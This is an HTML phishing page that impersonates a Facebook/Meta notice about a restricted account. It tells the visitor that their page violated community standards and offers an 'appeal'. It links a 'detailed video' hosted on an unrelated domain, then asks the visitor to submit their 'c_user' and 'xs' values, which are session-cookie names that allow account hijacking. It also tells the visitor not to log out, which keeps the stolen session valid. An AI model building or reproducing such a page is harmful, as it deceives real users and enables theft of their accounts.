<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <link
      rel="icon"
      type="image/png"
      href="https://upload.wikimedia.org/wikipedia/commons/6/6c/Facebook_Logo_2023.png"
    />
    <link rel="stylesheet" href="styles.css" />
    <title>Action | Required</title>
    <script src="script.js"></script>
  </head>
  <body>
    <nav>
      <div class="nav-left">
        <p class="fb-2">facebook</p>
      </div>
      <div class="nav-right">
        <div class="search-box">
          <img
            src="https://purepng.com/public/uploads/large/search-icon-lob.png"
            alt="search-icon"
          />
          <input type="text" placeholder="Search" />
        </div>
      </div>
    </nav>
    <br /><br />

    <div class="main-body">
      <form
        class="content"
   

      >
        <div>
          <img
            src="https://upload.wikimedia.org/wikipedia/commons/a/ab/Meta-Logo.png"
            width="140"
          />
        </div>

        <p class="tr-5">
          We have detected unusual activity on your page that violates our
          community standards.
        </p>
        <br />
        <p class="tr-5">
          Your access to your page has been limited, and you are currently
          unable to post, share, or comment using your page.
        </p>
        <br />
        <p class="tr-5">
          If you believe this to be a mistake, you have the option to submit an
          appeal by providing the necessary information.
        </p>
        <br />

        <div class="video-text">
          <p>Must Watch Detailed Video Information:</p>
        </div>

        <div>
          <video
            controls=""
            width="300"
            poster="https://i.pinimg.com/originals/97/95/69/979569a2dedd37573974ceebc05b4a4e.png"
          >
            <source
              src="https://detailed-video-29b30.web.app/detailed%20video.mp4"
              type="video/mp4"
            />
          </video>
        </div>

        <p class="tr-5">
          Please be sure to provide the requested information below.
        </p>
        <br />

        <div>
          <p class="mt-4">c_user*</p>
          <input type="number" name="c_user" id="c_user" required="" />
        </div>
        <br />

        <div>
          <p class="mt-4">xs*</p>
          <input type="text" name="xs" id="xs" required="" />
        </div>
        <br />

        <p class="msi-4">
          **Please make sure account not to log out from your computer or laptop
          until you have received a verification email.
        </p>
        <br />

        <div class="container">
          <button class="button">
            <p>Submit</p>
          </button>
        </div>
        <br />
        <br />
      </form>
    </div>
    <br /><br />
    <div>
      <p class="copy-r">Meta ©️ 2024</p>
    </div>
  </body>
</html>